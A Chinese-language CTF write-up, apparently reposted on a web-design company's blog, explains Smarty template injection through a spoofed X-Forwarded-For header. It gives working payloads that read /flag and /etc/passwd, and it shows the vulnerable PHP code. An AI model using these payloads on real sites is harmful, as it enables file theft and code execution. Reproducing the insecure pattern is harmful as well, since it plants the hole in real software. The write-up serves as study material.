本篇內(nèi)容介紹了“Smarty SSTi怎么用”的有關(guān)知識(shí)，在實(shí)際案例的操作過程中，不少人都會(huì)遇到這樣的困境，接下來就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧！希望大家仔細(xì)閱讀，能夠?qū)W有所成！

創(chuàng)新互聯(lián)公司-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性價(jià)比扎賚特網(wǎng)站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫(kù),直接使用。一站式扎賚特網(wǎng)站制作公司更省心,省錢,快速模板網(wǎng)站建設(shè)找我們，業(yè)務(wù)覆蓋扎賚特地區(qū)。費(fèi)用合理售后完善，十多年實(shí)體公司更值得信賴。

題目描述

題目提供了一個(gè)讀取XFF頭的api ,頁面最下方有Build With Smarty的字樣,可以確定是用Smarty引擎寫的.

基本上可以確定該頁面存在SSTi的可能性

將xff頭從127.0.0.1改為127.0.0{1+2}出現(xiàn)如下結(jié)果

ssti無疑了

最終payload是

X-Forwarded-For: {if var_dump(file_get_contents('/flag')) }{/if}

Smarty SSTI 利用

Smarty是基于PHP開發(fā)的，對(duì)于Smarty的SSTI的利用手段與常見的flask的SSTI有很大區(qū)別。

漏洞確認(rèn)

一般情況下輸入{$smarty.version}就可以看到返回的smarty的版本號(hào)。該題目的Smarty版本是3.1.30

常規(guī)利用方式

Smarty支持使用{php}{/php}標(biāo)簽來執(zhí)行被包裹其中的php指令，最常規(guī)的思路自然是先測(cè)試該標(biāo)簽。但就該題目而言，使用{php}{/php}標(biāo)簽會(huì)報(bào)錯(cuò)：

在Smarty3的官方手冊(cè)里有以下描述:

Smarty已經(jīng)廢棄{php}標(biāo)簽，強(qiáng)烈建議不要使用。在Smarty 3.1，{php}僅在SmartyBC中可用。

該題目使用的是Smarty類，所以只能另尋它路。

{literal}標(biāo)簽

官方手冊(cè)這樣描述這個(gè)標(biāo)簽：

{literal}可以讓一個(gè)模板區(qū)域的字符原樣輸出。這經(jīng)常用于保護(hù)頁面上的Javascript或css樣式表，避免因?yàn)镾marty的定界符而錯(cuò)被解析。

那么對(duì)于php5的環(huán)境我們就可以使用

<script language="php">phpinfo();</script>

來實(shí)現(xiàn)PHP代碼的執(zhí)行，但這道題的題目環(huán)境是PHP7，這種方法就失效了。

靜態(tài)方法

通過self獲取Smarty類再調(diào)用其靜態(tài)方法實(shí)現(xiàn)文件讀寫被網(wǎng)上很多文章采用。

Smarty類的getStreamVariable方法的代碼如下：

public function getStreamVariable($variable)
{
       $_result = '';
       $fp = fopen($variable, 'r+');
       if ($fp) {
           while (!feof($fp) && ($current_line = fgets($fp)) !== false) {
               $_result .= $current_line;
          }
           fclose($fp);
           return $_result;
      }
       $smarty = isset($this->smarty) ? $this->smarty : $this;
       if ($smarty->error_unassigned) {
           throw new SmartyException('Undefined stream variable "' . $variable . '"');
      } else {
           return null;
      }
  }

可以看到這個(gè)方法可以讀取一個(gè)文件并返回其內(nèi)容，所以我們可以用self來獲取Smarty對(duì)象并調(diào)用這個(gè)方法，很多文章里給的payload都形如：{self::getStreamVariable("file:///etc/passwd")}。然而使用這個(gè)payload會(huì)觸發(fā)報(bào)錯(cuò)如下：

Fatal error: Uncaught --> Smarty Compiler: Syntax error in template "string:<meta http-equiv="...">Current IP:{self::getStreamVariable(‘file:///etc/passwd’)}" static class 'self' is undefined or not allowed by security setting <-- thrown in /var/www/html/smarty/libs/sysplugins/smarty_internal_templatecompilerbase.phpon line 12

可見這個(gè)舊版本Smarty的SSTI利用方式并不適用于新版本的Smarty。而且在3.1.30的Smarty版本中官方已經(jīng)把該靜態(tài)方法刪除。對(duì)于那些文章提到的利用 Smarty_Internal_Write_File 類的writeFile方法來寫shell也由于同樣的原因無法使用。

{if}標(biāo)簽

官方文檔中看到這樣的描述：

Smarty的{if}條件判斷和PHP的if 非常相似，只是增加了一些特性。每個(gè){if}必須有一個(gè)配對(duì)的{/if}. 也可以使用{else}和{elseif}. 全部的PHP條件表達(dá)式和函數(shù)都可以在if內(nèi)使用，如||, or, &&, and, is_array(), 等等

既然全部的PHP函數(shù)都可以使用，那么我們是否可以利用此來執(zhí)行我們的代碼呢？

正如開頭所說的

題目漏洞代碼

通過getshell之后的文件讀取，本題中引發(fā)SSTI的代碼簡(jiǎn)化后如下：

<?php
require_once('./smarty/libs/' . 'Smarty.class.php');
$smarty = new Smarty();
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
$smarty->display("string:".$ip);
}

可以看到這里使用字符串代替smarty模板，導(dǎo)致了注入的Smarty標(biāo)簽被直接解析執(zhí)行，產(chǎn)生了SSTI。

“Smarty SSTi怎么用”的內(nèi)容就介紹到這里了，感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識(shí)可以關(guān)注創(chuàng)新互聯(lián)網(wǎng)站，小編將為大家輸出更多高質(zhì)量的實(shí)用文章！

當(dāng)前名稱：SmartySSTi怎么用
網(wǎng)頁URL：http://chinadenli.net/article0/jpspoo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供自適應(yīng)網(wǎng)站、網(wǎng)站建設(shè)、外貿(mào)建站、網(wǎng)站維護(hù)、用戶體驗(yàn)、定制網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)